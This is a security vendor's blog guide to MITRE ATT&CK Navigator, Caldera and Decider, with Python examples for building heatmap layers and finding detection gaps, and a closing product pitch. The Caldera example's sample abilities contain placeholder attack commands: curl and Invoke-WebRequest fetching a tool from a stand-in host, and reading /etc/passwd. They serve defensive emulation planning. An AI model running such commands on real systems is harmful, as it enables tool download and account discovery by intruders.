A Guide to MITRE ATT&CK Tools
MITRE ATT&CK tools can help security teams get started with MITRE’s widely used knowledge base of adversary tactics and techniques.
Created in 2013, the MITRE ATT&CK framework, which describes adversary behaviour as a consistent set of tactics, techniques, and sub-techniques, has grown steadily in popularity. Today it is an important resource for security teams in businesses of all sizes and across all industries.
In 2022, research by ESG found that almost 1 in 2 organisations use ATT&CK “extensively,” while a similar number use it on a limited basis.
However, while many organisations tell ESG that ATT&CK is “critical” or “important” to their future security operations strategy, past research shows that many security professionals (52% in one survey) are not very confident in their ability to use ATT&CK in their day-to-day work, a finding that more recent research confirms.
Luckily, there are plenty of tools security teams can use to make ATT&CK actionable. Here are three of them, plus how SenseOn automates MITRE ATT&CK to improve security teams’ threat detection capabilities.
ATT&CK Navigator
ATT&CK Navigator is a free tool created by the MITRE Corporation. It helps organisations and teams make sense of the MITRE ATT&CK knowledge base.
The purpose of ATT&CK Navigator is to make it easier to navigate, annotate, and visualise ATT&CK, something security teams had already been doing in spreadsheets. Navigator saves annotations as “layers”: JSON files that colour, score, and comment individual techniques and can be shared, combined, or regenerated from other data sources.
ATT&CK Navigator is deliberately generic, so different organisations can use it for different purposes. Examples include red/blue team planning, highlighting the frequency of detected techniques, and identifying gaps in defensive coverage.
In our blog post on why and how organisations should adopt a “compromised mindset,” we talk about using ATT&CK Navigator to pinpoint the tactics and techniques of threat groups that may be of particular significance to your organisation/industry.
Organisations can use ATT&CK Navigator with the Enterprise, Mobile, and ICS matrices, or with custom ATT&CK collections and STIX bundles. Since Navigator is web-based, the hosted instance requires no installation. Security professionals who want to run it locally can clone the source from MITRE’s GitHub repository and build it themselves.
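The most common way to feed Navigator from your own data is to generate a layer file rather than clicking through the matrix by hand. The following is an added example, not code from MITRE or from Navigator itself: it turns a constructed list of detections (technique ID, host) into a layer that scores each technique by how often it fired, so the matrix renders as a frequency heatmap. The version strings in the “versions” block are assumptions and should match the Navigator build and ATT&CK release you actually use.

```python
"""Build an ATT&CK Navigator layer file that colours techniques by detection frequency."""
import json
import re
from collections import Counter, defaultdict

# Constructed sample detections for this example: (ATT&CK technique ID, host). Not real data.
SAMPLE_DETECTIONS = [
    ("T1059.001", "ws-017"),
    ("T1059.001", "ws-042"),
    ("T1059.001", "srv-db01"),
    ("T1021.002", "srv-db01"),
    ("T1021.002", "srv-fs02"),
    ("T1003.001", "dc01"),
]

# ATT&CK IDs look like T1059 (technique) or T1059.001 (sub-technique).
TECHNIQUE_ID = re.compile(r"^T\d{4}(\.\d{3})?$")


def build_layer(detections, name="Detected techniques", domain="enterprise-attack"):
    """Return a Navigator layer (as a dict) that scores each technique by detection count.

    Sub-techniques are scored directly; each parent technique gets an unscored entry with
    showSubtechniques set so the heatmap expands the sub-techniques instead of hiding them.
    """
    counts = Counter()
    hosts = defaultdict(set)
    for technique_id, host in detections:
        if not TECHNIQUE_ID.match(technique_id):
            raise ValueError(f"not an ATT&CK technique ID: {technique_id!r}")
        counts[technique_id] += 1
        hosts[technique_id].add(host)

    techniques = []
    for technique_id, n in sorted(counts.items()):
        techniques.append({
            "techniqueID": technique_id,
            "score": n,
            "comment": f"{n} detection(s) on {', '.join(sorted(hosts[technique_id]))}",
        })
    # Parent entries for any scored sub-technique whose parent was not itself scored.
    parents = {t.split(".")[0] for t in counts if "." in t} - set(counts)
    for parent in sorted(parents):
        techniques.append({"techniqueID": parent, "showSubtechniques": True})

    max_score = max(counts.values(), default=0)
    return {
        "name": name,
        # Assumed version fields: set them to the Navigator build and ATT&CK release you use.
        "versions": {"attack": "14", "navigator": "4.9.1", "layer": "4.5"},
        "domain": domain,
        "description": "Score = number of detections per technique in the sampled window.",
        "techniques": techniques,
        # White for unseen techniques through to red for the most frequently detected one.
        "gradient": {"colors": ["#ffffff", "#ff6666"], "minValue": 0, "maxValue": max_score},
        "legendItems": [{"label": f"{max_score} detections (most frequent)", "color": "#ff6666"}],
    }


def write_layer(layer, path):
    """Write the layer as JSON; load it in Navigator via Open Existing Layer, Upload from local."""
    with open(path, "w", encoding="utf-8") as fh:
        json.dump(layer, fh, indent=2)
    return path


if __name__ == "__main__":
    write_layer(build_layer(SAMPLE_DETECTIONS), "detections-layer.json")
```

The same function works for a coverage-gap layer: feed it the techniques your detection rules claim to cover (one entry each) and compare the two layers side by side in Navigator, or swap the score for a flag that marks techniques seen in incidents but absent from the coverage list.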
Caldera
Developed by MITRE, Caldera is a free, automated adversary emulation system. It was built on the ATT&CK framework and gives security teams a way to run simulated cyber attacks in a safe environment.
Although Caldera can be used in many different ways, most organisations use it for defensive (blue) and offensive (red) operations.
MITRE identifies three core use cases for Caldera:
Autonomous red team engagements. Security teams can build cyber threat profiles based on relevant adversary tactics, techniques, and procedures (TTPs) in ATT&CK and then launch these profiles to see where weaknesses in their defences may lie. This was Caldera’s original use case.
Autonomous incident response. Through deployed agents, security teams can identify the TTPs that other security controls might miss.
Manual red team engagements. Security teams can replace or augment other offensive tools with Caldera when undertaking manual red team assessments.
The Caldera platform consists of the core system and plugins, which add functionality. For example, the Human plugin performs random, human-like actions on Windows, Linux, and macOS systems so that an emulation runs against realistic background activity rather than an idle host.
Something to keep in mind is that Caldera can be time-intensive to set up. On the whole, though, the process is well documented on GitHub.
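Because every Caldera ability is tagged with an ATT&CK tactic and technique, an adversary profile doubles as a list of the techniques an operation will exercise. The following added example (not Caldera’s own code, and the abilities, commands, and adversary profile in it are constructed placeholders that mirror the fields of Caldera’s ability and adversary YAML) resolves a profile for a target platform, notes which steps have no executor there and so will never run, and lists the techniques that will run but that no detection covers. The second point matters in practice: a Windows-only credential-dumping ability tells you nothing about your Linux coverage, so it should not be counted as tested.

```python
"""Plan a Caldera-style operation for a platform and list the detection gaps it will exercise."""
import re

TECHNIQUE_ID = re.compile(r"^T\d{4}(\.\d{3})?$")

# Constructed abilities mirroring the fields of a Caldera ability YAML file
# (id, name, tactic, technique.attack_id, platforms -> executor -> command).
# Commands are placeholders for illustration; these are not Caldera's own abilities.
ABILITIES = [
    {"id": "ab-001", "name": "Host information", "tactic": "discovery",
     "technique": {"attack_id": "T1082", "name": "System Information Discovery"},
     "platforms": {"windows": {"psh": {"command": "systeminfo"}},
                   "linux": {"sh": {"command": "uname -a"}}}},
    {"id": "ab-002", "name": "Local accounts", "tactic": "discovery",
     "technique": {"attack_id": "T1087.001", "name": "Local Account"},
     "platforms": {"windows": {"psh": {"command": "net user"}},
                   "linux": {"sh": {"command": "cut -d: -f1 /etc/passwd"}}}},
    {"id": "ab-003", "name": "Dump credentials", "tactic": "credential-access",
     "technique": {"attack_id": "T1003.001", "name": "LSASS Memory"},
     # Windows-only: there is deliberately no Linux executor for this ability.
     "platforms": {"windows": {"psh": {"command": "(credential dump command omitted)"}}}},
    {"id": "ab-004", "name": "Fetch tool", "tactic": "command-and-control",
     "technique": {"attack_id": "T1105", "name": "Ingress Tool Transfer"},
     "platforms": {"windows": {"psh": {"command": "Invoke-WebRequest https://example.invalid/t -OutFile t"}},
                   "linux": {"sh": {"command": "curl -sO https://example.invalid/t"}}}},
]

# Constructed adversary profile; atomic_ordering is the field Caldera uses for the ability sequence.
ADVERSARY = {"name": "Constructed profile", "atomic_ordering": ["ab-001", "ab-002", "ab-003", "ab-004"]}


def plan_operation(adversary, abilities, platform):
    """Resolve atomic_ordering into ordered steps, recording the executor usable on `platform`.

    A step whose executor is None has no implementation for that platform; Caldera would skip it,
    so the technique is not actually tested by the operation.
    """
    by_id = {a["id"]: a for a in abilities}
    steps = []
    for ability_id in adversary["atomic_ordering"]:
        ability = by_id[ability_id]  # KeyError here means the profile references an unloaded ability
        technique = ability["technique"]["attack_id"]
        if not TECHNIQUE_ID.match(technique):
            raise ValueError(f"ability {ability_id} has a malformed technique ID: {technique!r}")
        executors = ability["platforms"].get(platform, {})
        steps.append({
            "ability": ability_id,
            "tactic": ability["tactic"],
            "technique": technique,
            "executor": next(iter(executors), None),
        })
    return steps


def skipped_steps(steps):
    """Ability IDs that cannot run on the planned platform."""
    return [s["ability"] for s in steps if s["executor"] is None]


def detection_gaps(steps, detected_techniques):
    """Techniques the operation will really execute but that no detection rule covers."""
    exercised = {s["technique"] for s in steps if s["executor"] is not None}
    return sorted(exercised - set(detected_techniques))


if __name__ == "__main__":
    covered = {"T1082", "T1003.001"}  # constructed: what our detection rules claim to cover
    for platform in ("linux", "windows"):
        steps = plan_operation(ADVERSARY, ABILITIES, platform)
        print(platform, "skipped:", skipped_steps(steps), "gaps:", detection_gaps(steps, covered))
```

Run against a real Caldera deployment you would load the ability and adversary YAML from the data directories of the stockpile plugin (or your own plugin) instead of the inline dicts, and take the “covered” set from your detection rule metadata; the gap list is then a direct, per-platform statement of what the emulation will expose that the SOC cannot currently see.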
Decider
Decider, released in 2023, is a newer ATT&CK tool that makes it easier for organisations to map observed adversary behaviour to the ATT&CK framework and anticipate attackers’ next moves, regardless of how familiar an analyst is with ATT&CK.
Created by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) in collaboration with MITRE and the Homeland Security Systems Engineering and Development Institute (HSSEDI), Decider can be used alongside the second edition of CISA’s ATT&CK mapping guide.
Decider works by asking users several guided questions about how threats are behaving to help security teams identify the correct ATT&CK tactics, techniques, and sub-techniques they’re seeing. Questions are phrased in straightforward language, for example, “What is the adversary trying to do?”
Decider not only helps identify the technique or sub-technique in use; it also pulls the description of the behaviour directly from the ATT&CK matrices, lists similar techniques, and lets users flag potentially incorrect mappings.
According to section chief at CISA James Stanley, the idea was to “make it [ATT&CK framework] available to, say, junior analysts who could benefit from using it in real-time during middle-of-the-night incident response, for instance.”
Within Decider, organisations can save relevant techniques, add their own notes, and export them for use elsewhere, for example as a Microsoft Word table or as an ATT&CK Navigator layer.
Decider is a self-hosted web application, so organisations need to deploy it themselves (the source is published on CISA’s GitHub) before analysts can use it.
How SenseOn Uses MITRE ATT&CK for Threat Detection
SenseOn’s threat detection, investigation, and response platform integrates the MITRE ATT&CK framework to give security professionals context around attacker behaviour. This allows organisations to respond to threats faster and more effectively.
Anytime SenseOn spots suspicious behaviour (or “Observation”), it maps it against adversary TTPs in ATT&CK in real-time.
Notably, SenseOn is designed to surface only genuine alerts. It can do this because it was built to natively combine the capabilities of EDR, NDR, SIEM, and SOAR. As a result, it collects and correlates data from across an organisation’s entire digital estate (endpoints, network, and cloud infrastructure). Rather than looking at events in isolation, SenseOn looks at them in combination with other data points.
When SenseOn spots a connection between suspicious behaviours, it builds a “Case.” Like Observations, Cases are also mapped to the ATT&CK framework.
Cases show a timeline of suspicious events, the relationship between targeted devices, and the ATT&CK techniques and sub-techniques used. Cases also include links to the relevant sections of the ATT&CK website so that analysts can read more about the techniques they’re seeing in their environment and the mitigations for each.
In time-sensitive attacks like ransomware, where every second counts, SenseOn can also use automation to isolate infected devices and prevent lateral movement.
Learn more about how SenseOn automates the MITRE ATT&CK framework, or arrange a demo of the SenseOn platform today.